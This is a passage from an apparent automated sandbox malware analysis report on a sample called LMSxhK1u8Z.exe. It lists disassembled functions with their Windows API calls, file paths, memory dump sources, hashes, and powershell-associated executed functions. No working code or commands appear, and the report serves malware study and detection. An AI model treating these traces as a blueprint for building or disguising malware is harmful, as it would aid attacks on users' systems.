                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Timeout
                                                                                                • String ID: !
                                                                                                • API String ID: 1777923405-2657877971
                                                                                                • Opcode ID: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                                                                • Instruction ID: cdd208a87cf377e151b028b5bc2daf4d5ae5f0581749dcda0b9a9113f5b0b00f
                                                                                                • Opcode Fuzzy Hash: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                                                                • Instruction Fuzzy Hash: 35216271A44109AFDF01AFB0DA4AAAE7A75EF44744F14403EF502B61D1DAB88590DB58
                                                                                                Function 00401F98 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                                  • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,74DF23A0), ref: 00405055
                                                                                                  • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                • String ID: OC
                                                                                                • API String ID: 334405425-1597561874
                                                                                                • Opcode ID: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                                                                • Instruction ID: a758f152f971d74a5f32e3130d7e663150c352659b46f9ca4e023949e3a286cd
                                                                                                • Opcode Fuzzy Hash: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                                                                • Instruction Fuzzy Hash: 0A21A771900216EBCF20AFA5CE49A9E7EB0AF09354F20413BF615B51E0D7BD8982DB5D
                                                                                                Function 004057AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004057B4
                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004057BE
                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 004057D0
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 2659869361-3081826266
                                                                                                • Opcode ID: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                                                                • Instruction ID: d5080c12e7ff52c275ddc2bb7fa08cb5908483c46ce1eaa0ff7902437740b8fb
                                                                                                • Opcode Fuzzy Hash: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                                                                • Instruction Fuzzy Hash: 6ED05E31101E20AAC1116B549C08EDF66ACEE45300740802BF141B30A1D7781D418AFD
                                                                                                Function 00402C9B Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000,00000000,00402E7B,00000001,?,?,?,00000000,004033FE,?), ref: 00402CAE
                                                                                                • GetTickCount.KERNEL32 ref: 00402CCC
                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402CE9
                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004033FE,?), ref: 00402CF7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                • String ID:
                                                                                                • API String ID: 2102729457-0
                                                                                                • Opcode ID: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                                                                • Instruction ID: 286efe5820fb8a572a90530028cebd71549732c65272ed0b190b82beaa7bbda7
                                                                                                • Opcode Fuzzy Hash: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                                                                • Instruction Fuzzy Hash: 6CF05E70606620BFD7216B24FF4D98F7A64F744B11B91043AF141B11E4C7B448C18BDC
                                                                                                Function 00404F6E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 00404F9D
                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00404FEE
                                                                                                  • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                • String ID:
                                                                                                • API String ID: 3748168415-3916222277
                                                                                                • Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                                                • Instruction ID: 5368250be3cb6e4106e80ca770201d47c576881e659a98db37bb9bc21f5752cc
                                                                                                • Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                                                • Instruction Fuzzy Hash: 1A0184B150020AAFDF219F11DD81EAB3766EBC5755F104037FB00761D1CB7A8D62D669
                                                                                                Function 00403685 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,0040365D,0040349F,?), ref: 0040369F
                                                                                                • GlobalFree.KERNEL32(?), ref: 004036A6
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403697
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$GlobalLibrary
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 1100898210-3081826266
                                                                                                • Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                                                • Instruction ID: 198638f61427fefc2148c68e53f1161767bd25bd987848fccacf8e5b1a1d3e49
                                                                                                • Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                                                • Instruction Fuzzy Hash: C1E08C3250112067CA315F65E90472AB76CAF4AB22F05442AE8807B36087745C534BC8
                                                                                                Function 004057FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LMSxhK1u8Z.exe,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00405800
                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LMSxhK1u8Z.exe,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE), ref: 00405810
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrlen
                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                • API String ID: 2709904686-224404859
                                                                                                • Opcode ID: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                                                                • Instruction ID: 957e04025a41c1941cffb014cac20df3e0ff5def3477a48c76d927f6f21090a4
                                                                                                • Opcode Fuzzy Hash: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                                                                • Instruction Fuzzy Hash: EED05EB3411D209AD3127B04DC04A9F67ACFF51300746846AE841A61A1D7B85C908AEC
                                                                                                Function 00405934 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 0040595C
                                                                                                • CharNextA.USER32(?,?,00000000,00405B51,00000000,[Rename]), ref: 0040596D
                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                • Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                                                • Instruction ID: d765cdcf26b5ece385e96dcd0ac43345a120d35f2bfa0d6b32256e58560247d7
                                                                                                • Opcode Fuzzy Hash: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                                                • Instruction Fuzzy Hash: 60F09632504918FFC7129FA5DD00D9FBBA8EF163A4B2540BAE841F7211D674DE019F59

                                                                                                Executed Functions

                                                                                                Function 07BCBB37 Relevance: 14.7, Strings: 11, Instructions: 993COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q$4tl$4tl$x.hk$x.hk$-hk
                                                                                                • API String ID: 0-3394531315
                                                                                                • Opcode ID: f77eec1a97651643685bc4b2f84dba80de30ae0f5dddf066e0859bf64fcb803d
                                                                                                • Instruction ID: d51a8abeb4d2d556e0ea46cff303f462c8846a24d520082393c1f8cf2f152419
                                                                                                • Opcode Fuzzy Hash: f77eec1a97651643685bc4b2f84dba80de30ae0f5dddf066e0859bf64fcb803d
                                                                                                • Instruction Fuzzy Hash: 399264B0A002199FD724DF58C951BAABBB2EB95314F50C0D9D9099F341CB72ED85CFA1
                                                                                                Function 07BC72B8 Relevance: 10.4, Strings: 8, Instructions: 373COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3769942141
                                                                                                • Opcode ID: 1abc7ec6e172bcae73b01c40fbfe7a5d36b1dc8fd089a5ce8ccb2e834d750c2b
                                                                                                • Instruction ID: 40bc515d7fe03cb6ace65b7753f085681e7041f9ad986174d73b302cfddb9c5f
                                                                                                • Opcode Fuzzy Hash: 1abc7ec6e172bcae73b01c40fbfe7a5d36b1dc8fd089a5ce8ccb2e834d750c2b
                                                                                                • Instruction Fuzzy Hash: 02E191F4A002059FDB24DF68C555BAEBBE2EB84301F50C4A9DA056F395CF71E8468FA1
                                                                                                Function 07BCF780 Relevance: 10.3, Strings: 8, Instructions: 327COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$W$$^q$$^q$$^q
                                                                                                • API String ID: 0-2323755208
                                                                                                • Opcode ID: 654c1de27f8f2eaacda4eaf7d7c8133cf1f37f25b0e8b99191d0774d858431b5
                                                                                                • Instruction ID: ddbfafe0d3f6e5d71829f3c3321df9a0058f94a002c40e4ae2c4ba168e1694f4
                                                                                                • Opcode Fuzzy Hash: 654c1de27f8f2eaacda4eaf7d7c8133cf1f37f25b0e8b99191d0774d858431b5
                                                                                                • Instruction Fuzzy Hash: 9EB115F2B0021ADFEF25CA2885152BABBA3EB85311F14C0EED815DF251DB75C945CBA1
                                                                                                Function 07BC7296 Relevance: 6.6, Strings: 5, Instructions: 310COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$4'^q$4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3948404401
                                                                                                • Opcode ID: 5bd3f3c80ab40165934f85ecdcc3c66aa91a5d2a1c304a983c0be159f14052f3
                                                                                                • Instruction ID: 1eb88d9ed6e1e397ea77de1425f2f83a64d34ff7161490b014dfde5af5567b53
                                                                                                • Opcode Fuzzy Hash: 5bd3f3c80ab40165934f85ecdcc3c66aa91a5d2a1c304a983c0be159f14052f3
                                                                                                • Instruction Fuzzy Hash: 55C17DF4A002059FDB24CF58C550BADBBF2EB88314F54C4A9DA05AF395CB75A846CFA1
                                                                                                Function 07BC6600 Relevance: 5.6, Strings: 4, Instructions: 607COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
